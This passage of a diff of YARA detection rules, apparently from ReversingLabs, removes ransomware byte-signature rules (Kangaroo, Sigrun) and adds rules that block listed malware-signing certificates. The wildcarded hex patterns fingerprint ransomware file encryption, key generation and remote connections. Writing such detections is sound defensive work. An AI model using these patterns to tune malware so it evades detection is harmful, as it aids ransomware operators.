-            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 16 52 8D 84 24 ??
-            ?? ?? ?? 50 FF D3 85 C0 75 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? E9 ?? ?? ?? ?? 57 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C0 ?? 8D 94 24 ?? ?? ?? ?? 2B D0 0F
-            B7 08 66 89 0C 02 83 C0 ?? 66 3B CD 75 ?? 33 C0 EB ?? 8D A4 24 ?? ?? ?? ?? 8D 49 ??
-            0F B7 8C 04 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83 C0 ?? 66 3B CD 75 ?? 33 C0 8D 9B
-            ?? ?? ?? ?? 0F B7 88 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83 C0 ?? 66 3B CD 75 ?? 8B
-            5C 24 ?? 6A ?? B9 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 8D 8C
-            24 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ??
-            ?? ?? 64 A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 DB 3B C3 75 ?? 6A ?? E8 ?? ?? ?? ?? 8B F0
-            83 C4 ?? 3B F3 74 ?? 68 ?? ?? ?? ?? 8D 46 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6
-            EB ?? 33 C0 A3 ?? ?? ?? ?? 8D 4C 24 ?? 51 8B F8 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 33 D2 53 89 9C 24 ?? ?? ?? ?? 50 66 89 94 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 33 C0 53 51 66 89 84 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 33 D2 53 50 66 89 54
-            24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 47 ?? 83 C4 ?? 50 89 5C 24 ?? 89 44 24 ?? E8 ??
-            ?? ?? ?? 53 53 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? 8B
-        }
-		$encrypt_files_p2 = {
-            F4 33 C9 8D 84 24 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 89 5E ?? 89 64 24 ?? 66 89 4E ??
-            8D 50 ?? 90 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 6A ?? 8D 94 24 ?? ?? ?? ?? 52 53 FF 15 ?? ?? ?? ??
-            85 C0 74 ?? 83 EC ?? 8B F4 33 C0 C7 46 ?? ?? ?? ?? ?? 89 5E ?? 66 89 46 ?? 8D 84 24
-            ?? ?? ?? ?? 89 64 24 ?? 8D 50 ?? EB ?? 8D 49 ?? 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B
-            C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 6A ?? 8D 8C 24
-            ?? ?? ?? ?? 51 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? 8B F4 33 D2 C7 46 ?? ?? ??
-            ?? ?? 89 5E ?? 8D 84 24 ?? ?? ?? ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? EB ?? 8D 49 ??
-            66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            57 E8 ?? ?? ?? ?? 53 6A ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
-            ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 EC ?? 8B F4 33 D2 C7 46 ?? ??
-            ?? ?? ?? 89 5E ?? 8D 44 24 ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? 8D A4 24 ?? ?? ?? ??
-            66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 44 24 ?? E8 ?? ?? ?? ?? 57 E8 ??
-            ?? ?? ?? 53 6A ?? 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
-            ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 EC ?? 8B F4 33 D2 C7
-        }
-		$encrypt_files_p3 = {
-            46 ?? ?? ?? ?? ?? 89 5E ?? 8D 84 24 ?? ?? ?? ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? 90
-            66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 44 24 ?? 50 53 6A ?? 53 53 53 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24 ?? 51 FF 15 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B F8 53
-            57 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 54
-            24 ?? 52 57 8B CE E8 ?? ?? ?? ?? 8B 74 24 ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 74 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 8C 24 ?? ?? ?? ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ??
-            ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$generate_key = {
-            50 C7 44 24 ?? ?? ?? ?? ?? F3 A5 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ??
-            ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 44 24 ?? 8D 4C 24 ?? 51
-            6A ?? 6A ?? 6A ?? 8D 54 24 ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ??
-            ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 6A ?? 8D 4C
-            24 ?? 51 6A ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 8B 4C 24
-            ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 6A ?? 8D 44 24 ?? 50 8D 4C 24
-            ?? 51 6A ?? 52 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ??
-            ?? ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 44 24 ?? C1 E8 ??
-            89 44 24 ?? 03 C3 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 5F 5E 5D B8 ?? ?? ??
-            ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 53 55 56 E8 ?? ?? ?? ?? 8B
-            4C 24 ?? 83 C4 ?? 89 5C 24 ?? 83 C3 ?? 53 8D 44 24 ?? 50 56 6A ?? 6A ?? 6A ?? 51 FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ??
-            ?? 83 C4 ?? C2 ?? ?? 8B 7C 24 ?? 8B 54 24 ?? 57 56 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 56
-            89 38 E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 5F 5E 5D 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 83
-            C4 ?? C2
-        }
-		$remote_connection = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 57 8D 44 24 ?? 50 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 46 ?? 83
-            F8 ?? 74 ?? 8B 46 ?? 8D 7E ?? 83 E8 ?? 83 78 ?? ?? 7E ?? 8B 48 ?? 51 8B CF E8 ?? ??
-            ?? ?? 8B 3F 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 54 24 ?? 52 89 44 24 ?? FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? 8B 46 ?? 50 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 5F 8B 8C 24
-            ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 8B 48 ?? 8B 11 8B 02 0F B7 56
-            ?? B9 ?? ?? ?? ?? 52 89 44 24 ?? 66 89 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 4E ?? 66 89 44
-            24 ?? 6A ?? 8D 44 24 ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 8B
-            56 ?? 52 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 5F 8B 8C 24 ?? ?? ?? ?? 33 CC E8
-            ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 8B 8C 24 ?? ?? ?? ?? 5F 33 CC B8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_shares ) and ( all of ( $find_files_p* ) ) and ( $generate_key ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Largos" and pe.signatures [ i ] . serial == "35:59:0e:be:4a:02:dc:23:31:7d:8c:e4:7a:94:7a:9b" and 1602201600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Kangaroo : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Aa07D4F2857119Cee514A0Bd412F8201 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Kangaroo ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ec4342c1-adc9-5ddb-b403-83c2b1ce5899"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "6bb83f26-90f5-587f-8c69-fa06beaead3e"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Kangaroo.yara#L1-L91"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12102-L12120"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1078fb3d47ad737548419e5ee66e686f705c02fea27a58c0097446547325772c"
+		logic_hash = "fbbea89f2070b2a527bba6199022fbffd269e664b000988a59adf4ca0d4a9f22"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Kangaroo"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            83 EC ?? 53 55 8B 6C 24 ?? 56 57 33 FF 57 57 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 33 DB 55
-            89 5C 24 ?? 89 7C 24 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 0F 84 ?? ?? ??
-            ?? 8D 44 24 ?? 50 8D 4C 24 ?? 51 8D 54 24 ?? 52 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 57 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
-            8B 54 24 ?? 8D 4C 24 ?? 51 57 57 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85
-            ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 C0 50 8B 44 24 ?? 68 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 54 24 ?? 8B 44 24 ?? 8D 4C 24 ??
-            51 6A ?? 52 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 57 56 FF
-            15 ?? ?? ?? ?? 8B 54 24 ?? 57 8D 4C 24 ?? 51 57 57 6A ?? 57 52 89 44 24 ?? FF 15 ??
-            ?? ?? ?? 8B 44 24 ?? 6A ?? 68 ?? ?? ?? ?? 50 57 8B 3D ?? ?? ?? ?? FF D7 8B 54 24
-        }
-		$encrypt_files_p2 = {
-            6A ?? 8D 4C 24 ?? 51 52 8B D8 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B
-            44 24 ?? 8B 54 24 ?? 50 8D 4C 24 ?? 51 53 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 83
-            F8 ?? 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ??
-            8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8D 54 24
-            ?? 52 8D 44 24 ?? 50 8D 4C 24 ?? 51 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D7 68 ?? ?? ?? ?? 55 8B F8 68 ?? ?? ?? ?? 57
-            FF 15 ?? ?? ?? ?? 83 C4 ?? 57 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ??
-            ?? ?? ?? 8B C5 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15
-            ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 33 FF 8B 44 24 ?? 50 FF 15
-            ?? ?? ?? ?? 89 7C 24 ?? 8B 4C 24 ?? 57 51 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 5F
-            5E 5D 8B C3 5B 83 C4 ?? C3
-        }
-		$find_files = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 57 56 FF 15 ?? ?? ?? ?? 8B 3D ??
-            ?? ?? ?? 33 C9 83 F8 ?? 0F 94 C1 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 89 4C 24
-            ?? FF D7 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 44 24
-            ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB ?? EB ?? 8D A4 24 ?? ?? ?? ?? 90
-            8B 3D ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 8D 54 24 ?? 52 56 68 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 50 EB ?? 8D 4C 24 ?? 51 56 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D7 83
-            C4 ?? F6 44 24 ?? ?? 74 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85
-            C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 51 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D
-            94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 33 FF 33 F6 EB ?? 8D 9B
-            ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF D3 85 C0 74 ?? BF ?? ??
-            ?? ?? 83 C6 ?? 83 FE ?? 72 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D3 85 C0 75
-            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 85 C0 74 ?? BF ?? ?? ?? ?? 8B 44 24
-            ?? A8 ?? 75 ?? A9 ?? ?? ?? ?? 75 ?? 85 FF 75 ?? 3D ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ??
-            8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 8C
-            24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 75 ?? 8B 44 24 ?? 8D 54 24 ?? 52 50 FF 15 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 51 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D
-            C3
-        }
-		$enum_resources = {
-            55 8B EC 83 E4 ?? 83 EC ?? 8B 4D ?? 53 56 57 8D 44 24 ?? 50 51 6A ?? 6A ?? 6A ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5F 5E
-            5B 8B E5 5D C2 ?? ?? 8B 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8B 4C
-            24 ?? 8B C3 85 C9 74 ?? 8D 64 24 ?? C6 00 ?? 40 83 E9 ?? 75 ?? 8B 54 24 ?? 8D 44 24
-            ?? 50 53 8D 4C 24 ?? 51 52 E8 ?? ?? ?? ?? 85 C0 75 ?? 33 FF 39 7C 24 ?? 76 ?? 8D 73
-            ?? 8D 49 ?? 83 7E ?? ?? 75 ?? 8B 06 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4E ?? 83 E1 ?? 80
-            F9 ?? 75 ?? 8D 56 ?? 52 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B 7C 24 ?? 72 ?? EB ?? 3D ?? ??
-            ?? ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 50 E8 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ??
-            5B 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_resources )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HANGA GIP d.o.o." and ( pe.signatures [ i ] . serial == "00:aa:07:d4:f2:85:71:19:ce:e5:14:a0:bd:41:2f:82:01" or pe.signatures [ i ] . serial == "aa:07:d4:f2:85:71:19:ce:e5:14:a0:bd:41:2f:82:01" ) and 1615766400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sigrun : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_40F5660A90301E7A8A8C3B42 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sigrun ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fa627192-ed80-5115-a028-014f67f4571d"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "c47bb4f0-d60b-5948-ac10-6083606ed46a"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sigrun.yara#L1-L111"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12122-L12138"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ea29ec64cdfc0c714fe0acdce5878cb1302dd5aa916811121c644948ce275935"
+		logic_hash = "3573d1d5f11df106f1f6f44f8b0164992f2a50707c6df7b08b05ed9ea7d9173b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sigrun"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 83 7D ?? ?? 53 56 57 8B DA C7 44 24 ?? ?? ?? ??
-            ?? 8B F1 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 89 7C 24 ?? 85 C0 75 ?? 85 FF
-            75 ?? 5F 5E 5B 8B E5 5D C3 C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ??
-            A1 ?? ?? ?? ?? 89 44 24 ?? A1 ?? ?? ?? ?? 89 44 24 ?? 0F B7 06 66 89 44 24 ?? 83 F8
-            ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56
-            FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF D7 8D
-            44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75
-            ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74
-            ?? 8D 44 24 ?? 50 56 FF D7 F6 44 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ??
-            8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ??
-            ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 53 8D 54
-            24 ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74
-            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E
-            33 C0 5B 8B E5 5D C3
-        }
-		$encrypt_files_1 = {
-            55 8B EC 83 EC ?? 53 57 68 ?? ?? ?? ?? 8B FA 8B D9 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 33 C0 5B 8B E5 5D C3
-            56 8D 45 ?? 33 F6 50 56 56 57 53 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ??
-            C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 68 ??
-            ?? ?? ?? 50 FF 75 ?? C7 00 ?? ?? ?? ?? 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0
-            FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 5E 5F 5B 8B E5 5D C3
-        }
-		$encrypt_files_2 = {
-            55 8B EC 53 56 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B DA 8B F9 FF 15 ?? ??
-            ?? ?? 57 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CF E8 ?? ?? ?? ?? 85
-            C0 74 ?? 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 5D C3 8B CF E8 ??
-            ?? ?? ?? 85 C0 75 ?? 83 7B ?? ?? 72 ?? 8B 55 ?? 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 56
-            57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ??
-            5B 5D C3
-        }
-		$encrypt_files_3 = {
-            55 8B EC 83 EC ?? 56 57 E8 ?? ?? ?? ?? 85 C0 75 ?? 83 C8 ?? 5F 5E 8B E5 5D C3 8D 45
-            ?? 50 8D 45 ?? 50 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 8D 4D ?? 8B D7 E8
-            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 85 C0 74 ??
-            C6 04 08 ?? 8B 4D ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75
-            ?? FF D6 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 05 ?? ?? ?? ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D6 68 ?? ?? ?? ?? 6A ??
-            57 FF D6 5F 33 C0 5E 8B E5 5D C3
-        }
-		$enum_resources_1 = {
-            55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 8B 3D ?? ?? ?? ?? 8B F1 6A ?? 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 6A ?? 89 54 24 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? FF D7 8B 1D ?? ??
-            ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 85 F6 0F 85 ?? ??
-            ?? ?? 8D 44 24 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF D3 85 C0 0F 85 ?? ?? ?? ?? 8D 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF
